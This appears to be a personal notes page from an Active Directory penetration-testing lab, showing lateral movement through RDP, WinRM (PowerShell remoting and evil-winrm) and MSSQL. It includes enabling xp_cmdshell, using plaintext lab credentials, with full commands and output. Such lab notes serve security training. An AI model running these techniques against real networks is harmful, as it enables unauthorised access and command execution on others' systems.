👨‍💻👾👨‍💻👾👨‍💻👾

Search

SearchSearch

a-Privileged Access

Jan 07, 20253 min read

Let’s assume we are in the domain. We want to advance our position further by moving laterally or vertically.

Typically, if compromise local admin user, we will perform PtH but if that is not the case, now what?

What if we don’t yet have local admin rights on any hosts in the domain?

We can abuse following to move around a Windows a domain:

  • RDP
  • PowerShell Remoting - PSRemoting or WinRM
  • MSSQL Server

Remote Desktop

Let’s say we compromised user with RDP right on host.

We can possibly:

  • Launch further attacks
  • Escalate privilege and obtain creds for higher privileged user
  • Pillage the host for sensitive data

PowerView

RDP Members Check

Let’s use PowerView’s Get-netLocalGroupMember to enumerate members of Remote Desktop Users group on a given host.

PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
 
ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Desktop Users
MemberName   : INLANEFREIGHT\Domain Users
SID          : S-1-5-21-3842939050-3880317879-2865463114-513
IsGroup      : True
IsDomain     : UNKNOWN

We can see that all members in the domain can RDP to this host.

We can also use BloodHound for this purpose. First thing to check with Bloodhound is whether domain users group have local admin rights or execution rights such as rdp and winrm.

WinRM

PowerView

WinRM Members Check

Let’s check Remote Management Users members:

PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
 
ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Management Users
MemberName   : INLANEFREIGHT\forend
SID          : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup      : False
IsDomain     : UNKNOWN

User forend has winrm right over MS01.

WinRM from Windows

PS C:\htb> $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
PS C:\htb> $cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred
 
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> hostname
ACADEMY-EA-MS01
[ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> Exit-PSSession
PS C:\htb>

WinRM from Linux

[!bash!]$ evil-winrm -i 10.129.201.234 -u forend
 
Enter Password: 
 
Evil-WinRM shell v3.3
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
 
*Evil-WinRM* PS C:\Users\forend.INLANEFREIGHT\Documents> hostname
ACADEMY-EA-MS01

SQL Server Admin

It is common to find user and service accounts set up with sysadmin privilege on a given SQL server instance.

PowerUpSQL

Let’s use PowerUpSQL to enumerate MSSQL isntances:

PS C:\htb> cd .\PowerUpSQL\
PS C:\htb>  Import-Module .\PowerUpSQL.ps1
PS C:\htb>  Get-SQLInstanceDomain
 
ComputerName     : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL
Instance         : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433
DomainAccountSid : 1500000521000170152142291832437223174127203170152400
DomainAccount    : damundsen
DomainAccountCn  : Dana Amundsen
Service          : MSSQLSvc
Spn              : MSSQLSvc/ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL:1433
LastLogon        : 4/6/2022 11:59 AM

We can authenticate against the remote SQL server host and run custom queries as such:

PS C:\htb>  Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'
 
VERBOSE: 172.16.5.150,1433 : Connection Success.
 
Column1
-------
Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) ...

mssqlclient.py

[!bash!]$ mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
 
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands

Try enabling xp_cmdshell:

SQL> enable_xp_cmdshell
 
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

We can enumerate our rights as such:

xp_cmdshell whoami /priv

Moving On

Here we talked about lateral movement techniques in AD.

Graph View

Backlinks

  • No backlinks found